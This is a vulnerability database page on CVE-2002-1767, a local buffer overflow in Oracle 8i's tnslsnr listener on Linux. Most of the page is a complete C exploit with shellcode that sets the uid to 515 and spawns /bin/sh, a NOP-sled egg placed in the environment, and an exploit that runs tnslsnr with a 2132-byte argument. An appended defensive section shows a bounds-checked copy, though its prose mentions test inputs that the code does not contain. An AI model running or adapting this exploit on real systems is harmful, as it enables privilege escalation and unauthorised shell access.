Oracle 8i TNS Listener local command-line argument buffer overflow vulnerability
Vulnerability ID | 1106659 | Type | Buffer overflow |
Published | 2002-04-01 | Updated | 2005-10-20 |
CVE | CVE-2002-1767 |
CNNVD-ID | CNNVD-200212-086 |
Platform | Linux | CVSS score | 7.2 |
|Source
|Details
A buffer overflow vulnerability exists in tnslsnr in Oracle 8i Database Server 8.1.5 for Linux. A local user with database access can execute arbitrary code via an overly long command-line argument.
|Exploit
/*
source: http://www.securityfocus.com/bid/4413/info
Oracle 8i is a powerful relational database product. It is available for Windows, Linux, and a wide range of Unix operating systems.
A vulnerability has been reported with some versions of Oracle 8i for Linux. A local attacker able to execute the tnslsnr process may pass an oversized command line parameter and cause a buffer overflow, possibly leading to the execution of arbitrary code as the user 'oracle'.
Versions of Oracle 8i available for other operating systems have not yet been confirmed as vulnerable.
*/
/*
 * Yet another exploit for the 'Unbreakable' Oracle database
 * The vulnerability was found by KF / Snosoft (http://www.snosoft.com)
 * Shellcode created by r0z / Promisc
 * Exploit coded up by The Itch / Promisc (http://www.promisc.org)
 *
 * This exploit was developed on the Snosoft vulnerability research machines
 * mail [email protected] if you wish to participate in vuln research.
 *
 * - The Itch
 * - [email protected]
 *
 * - Technical details concerning the exploit -
 *
 * 1). Buffer overflow occurs after writing more than 2132 bytes into the
 *     buffer at the command line (2128 to overwrite ebp, 2132 to
 *     overwrite eip).
 * 2). If you write more than 2132 bytes, other frames will be
 *     overwritten afterwards and will mess up your flow of arbitrary code
 *     execution. (It must be exactly 2132 bytes!)
 * 3). shellcode will try to do a setreuid(515);
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memcpy */
#include <unistd.h>   /* execl */
#define DEFAULT_EGG_SIZE 4096
#define NOP 0x90
/* 2132 + 1 for the \0 at the end of the string */
#define DEFAULT_BUFFER_SIZE 2133
/* Shellcode made by r0z ([email protected]) */
char shellcode[] =
"\x31\xdb"              /* xor %ebx, %ebx */
"\x31\xc9"              /* xor %ecx, %ecx */
"\xf7\xe3"              /* mul %ebx */
"\xb0\x46"              /* mov $0x46, %al */
"\x66\xbb\x03\x02"      /* mov $0x203, %bx  (0x203 = 515) */
"\x49"                  /* dec %ecx */
"\xcd\x80"              /* int $0x80 */
"\x31\xd2"              /* xor %edx, %edx */
"\x52"                  /* push %edx */
"\x68\x6e\x2f\x73\x68"  /* push $0x68732f6e */
"\x68\x2f\x2f\x62\x69"  /* push $0x69622f2f */
"\x89\xe3"              /* mov %esp, %ebx */
"\x52"                  /* push %edx */
"\x53"                  /* push %ebx */
"\x89\xe1"              /* mov %esp, %ecx */
"\x6a\x0b"              /* pushl $0xb */
"\x58"                  /* pop %eax */
"\xcd\x80";             /* int $0x80 */
int main(int argc, char *argv[])
{
    char *buff;
    char *egg;
    char *ptr;
    long *addr_ptr;
    int bsize = DEFAULT_BUFFER_SIZE;
    int eggsize = DEFAULT_EGG_SIZE;
    int i;
    /* Address of a local variable, used as the guessed stack return address
     * (32-bit build assumed, as in the original). */
    int get_sp = (int)&get_sp;
    if(argc > 1) { bsize = atoi(argv[1]); }
    if(!(buff = malloc(bsize)))
    {
        printf("unable to allocate memory for %d bytes\n", bsize);
        exit(1);
    }
    if(!(egg = malloc(eggsize)))
    {
        printf("unable to allocate memory for %d bytes\n", eggsize);
        exit(1);
    }
    printf("Oracle tnslsnr 8.1.5\n");
    printf("Vulnerability found by KF / http://www.snosoft.com\n");
    printf("Coded by The Itch / http://www.promisc.org\n\n");
    printf("Using return address: 0x%x\n", get_sp);
    printf("Using buffersize : %d\n", bsize - 1);
    /* Fill the argument buffer with the return address, four bytes at a time,
     * without writing past the allocation. */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for(i = 0; i + 4 <= bsize; i += 4) { *(addr_ptr++) = get_sp; }
    /* Build the "egg": a NOP sled followed by the shellcode. */
    ptr = egg;
    for(i = 0; i < eggsize - (int)strlen(shellcode) - 1; i++)
    {
        *(ptr++) = NOP;
    }
    for(i = 0; i < (int)strlen(shellcode); i++)
    {
        *(ptr++) = shellcode[i];
    }
    egg[eggsize - 1] = '\0';
    /* The first four NOPs become the variable name so the egg can be exported. */
    memcpy(egg, "EGG=", 4);
    putenv(egg);
    buff[bsize - 1] = '\0';
    execl("/home/u01/app/oracle/product/8.1.5/bin/tnslsnr",
          "tnslsnr", buff, (char *)NULL);
    return 0;
}
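The bug class behind this advisory is a fixed-size buffer filled from a command-line argument with no length check. As an added defensive illustration (not code from the advisory, from Oracle, or from the exploit above), the block below places that unbounded-copy pattern next to a hardened copy that refuses any argument which would not fit, terminator included. The buffer size, the function names and the constructed test arguments are assumptions for illustration; tnslsnr's real buffer layout is not on the page.

```c
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Assumed buffer size for this illustration only (not tnslsnr's actual layout). */
#define ARG_BUF_SIZE 2048

/* Vulnerable pattern (illustrative; never called by the test helper below):
 * an unbounded copy of a command-line argument into a fixed-size stack buffer.
 * An argument at least ARG_BUF_SIZE bytes long runs past the buffer into the
 * saved frame pointer and return address, which is the failure the advisory
 * describes for an oversized tnslsnr argument. */
void unsafe_handle_arg(const char *arg)
{
    char buf[ARG_BUF_SIZE];
    strcpy(buf, arg);   /* no length check */
    (void)buf;
}

/* Hardened form: scan the argument only as far as the destination can hold
 * and reject it if no terminator appears within that window.
 * Returns 0 on success; returns -1 and sets errno to E2BIG on rejection,
 * leaving dst untouched. */
int copy_arg_checked(char *dst, size_t dst_size, const char *arg)
{
    size_t n = 0;
    /* Bounded scan: never reads more than dst_size bytes of arg. */
    while (n < dst_size && arg[n] != '\0')
        n++;
    if (n == dst_size) {
        /* No NUL within dst_size bytes: the argument cannot fit with its terminator. */
        errno = E2BIG;
        return -1;
    }
    memcpy(dst, arg, n + 1);   /* n + 1 copies the terminator as well */
    return 0;
}

/* Helper for exercising the check: builds a constructed argument of `len`
 * 'A' bytes and reports whether copy_arg_checked accepts it into an
 * ARG_BUF_SIZE buffer (1 = accepted, 0 = rejected, -1 = allocation failure). */
int arg_of_length_is_accepted(size_t len)
{
    char dst[ARG_BUF_SIZE];
    int accepted;
    char *arg = malloc(len + 1);
    if (arg == NULL)
        return -1;
    memset(arg, 'A', len);
    arg[len] = '\0';
    accepted = (copy_arg_checked(dst, sizeof dst, arg) == 0);
    free(arg);
    return accepted;
}
```

The check is deliberately done against the destination size rather than with strlen on the argument: strlen has no upper bound, so a hostile argument could drive it far past anything the program expects, whereas the bounded scan stops as soon as the argument is known not to fit. The 2132-byte length from the advisory is included among the constructed inputs so the rejection path is the one that matters here.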
|References
Source: XF
Name: oracle-tnslsnr-command-line-bo(8772)
Link: http://xforce.iss.net/xforce/xfdb/8772
Source: BID
Name: 4413
Link: http://www.securityfocus.com/bid/4413